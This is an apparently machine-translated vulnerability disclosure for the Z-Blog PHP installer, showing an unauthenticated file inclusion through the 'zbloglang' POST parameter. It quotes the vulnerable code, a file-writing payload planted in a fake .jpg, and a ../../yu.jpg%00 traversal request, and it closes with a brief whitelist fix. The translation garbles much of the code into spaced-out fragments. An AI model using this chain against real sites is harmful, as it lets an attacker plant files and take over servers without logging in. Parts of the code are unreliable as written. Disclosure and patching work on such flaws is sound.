The Z-blog front-end does not require logon. One vulnerability is included.

The Z-blog front-end does not require logon. One vulnerability is included.

I heard this is a big vendor? -.-
You do not need to log on to the front-end to include the vulnerability. You probably did not see the location where images could be uploaded.
Not detailed. That's it.

Http://www.zblogcn.com/zblogphp/



The problem occurs in zb_install/index. php.



I also noticed what I wrote after the installation is complete.
 

Create a database for the installation result! Zblog connects to the database and creates a data table! Data is successfully created and inserted! Save settings. The template is compiled successfully!

The prompt is that this does not prompt the user to delete this directory and will not automatically delete this file.

So it basically exists.


 

 /*** Z-Blog with PHP * @ author * @ copyright (C) rainbowSoft Studio * @ version 2.0 2013-07-05 * // *** installer * @ param * @ return array */require '.. /zb_system/function/c_system_base.php '; require '.. /zb_system/function/c_system_admin.php '; header ('content-type: text/html; charset = UTF-8'); define ('bingo ',''); define ('error', ''); $ zbloglang = & $ zbp-> option ['zc _ BLOG_LANGUAGEPACK ']; if (isset ($ _ POST ['zbloglang']) ) $ Zbloglang =$ _ POST ['zbloglang']; $ zbp-> LoadLanguage ('system', '', $ zbloglang ); $ zbp-> LoadLanguage ('zb _ install', 'zb _ install', $ zbloglang ); $ zbp-> option ['zc _ BLOG_LANGUAGE '] = $ zbp-> lang ['lang']; $ zblogstep = (int) GetVars ('step '); if ($ zblogstep = 0) $ zblogstep = 1; if ($ zbp-> option ['zc _ DATABASE_TYPE ']! = '') & ($ Zbp-> option ['zc _ YUN_SITE '] ='') {$ zblogstep = 0 ;} elseif ($ zbp-> option ['zc _ DATABASE_TYPE ']) & ($ zbp-> option ['zc _ YUN_SITE']) {if ($ zbp-> Config ('system')-> CountItem ()> 0) $ zblogstep = 0 ;}?>

 

$zbloglang=&$zbp->option['ZC_BLOG_LANGUAGEPACK'];if(isset($_POST['zbloglang']))$zbloglang=$_POST['zbloglang'];$zbp->LoadLanguage('system','',$zbloglang);$zbp->LoadLanguage('zb_install','zb_install',$zbloglang);$zbp->option['ZC_BLOG_LANGUAGE'] = $zbp->lang ['lang'];

In fact, the vulnerability is here.


 

Because this code is displayed before determining whether or not to install it, we can go here even if it is installed ..

 

$ Zbloglang = & $ zbp-> option ['zc _ BLOG_LANGUAGEPACK ']; // first, define zbloglangif (isset ($ _ POST ['zbloglang']). $ zbloglang = $ _ POST ['zbloglang ']; // If post is set, the variable is passed through post. Because zblog prevents SQL Injection by not splicing the query function, they do not escape post. This is because there is less injection, but it also causes this vulnerability. $ Zbp-> LoadLanguage ('system', '', $ zbloglang); // follow $ zbp-> LoadLanguage ('zb _ install', 'zb _ install ', $ zbloglang); $ zbp-> option ['zc _ BLOG_LANGUAGE '] = $ zbp-> lang ['lang'];

 

public function LoadLanguage($type,$id,$default=''){if($type=='system'){if($default=='')$default=$this->option['ZC_BLOG_LANGUAGEPACK'];if(is_readable($f=$this->path . 'zb_users/language/' . $default . '.php')){$this->lang = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='zh-cn';if(is_readable($f=$this->path . 'zb_users/language/' . $default . '.php')){$this->lang = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='en';if(is_readable($f=$this->path . 'zb_users/language/' . $default . '.php')){$this->lang = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}}elseif($type=='plugin' || $type=='theme'){if($default=='')$default=$this->option['ZC_BLOG_LANGUAGEPACK'];if(is_readable($f=$this->path . 'zb_users/'.$type.'/'.$id.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='zh-cn';if(is_readable($f=$this->path . 'zb_users/'.$type.'/'.$id.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='en';if(is_readable($f=$this->path . 'zb_users/'.$type.'/'.$id.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}}elseif($type!='' && $id!=''){if($default=='')$default=$this->option['ZC_BLOG_LANGUAGEPACK'];if(is_readable($f=$this->path . $type.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='zh-cn';if(is_readable($f=$this->path . $type.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}$default='en';if(is_readable($f=$this->path . $type.'/language/' . $default . '.php')){$this->lang[$id] = require($f);$this->langpacklist[]=array($type,$id,$default);return true;}}}

You can see that this function is everywhere. Although it is restricted to be suffixed with. php, we can cut off the. php later because it does not escape POST.



I probably couldn't find a place where I could upload images. I just created a jpg file myself. To test.



Create a yu.jpg File
 

 fputs(fopen('testx.php','w'),'
 ');

$ Zbp-> LoadLanguage ('system', '', $ zbloglang );

$ Zbp-> LoadLanguage ('zb _ install', 'zb _ install', $ zbloglang );



Because he loads two items here. When the first one is met, the second one will not be satisfied and an error will occur.

So we can directly fputs a file.



In the root directory.
 

http://web/small/zblog/zb_install/index.phpzbloglang=../../yu.jpg%00

 

 

Solution:

Zbloglang in post should be restricted here

In_array ('en', 'zh 'and other restrictions can only contain those files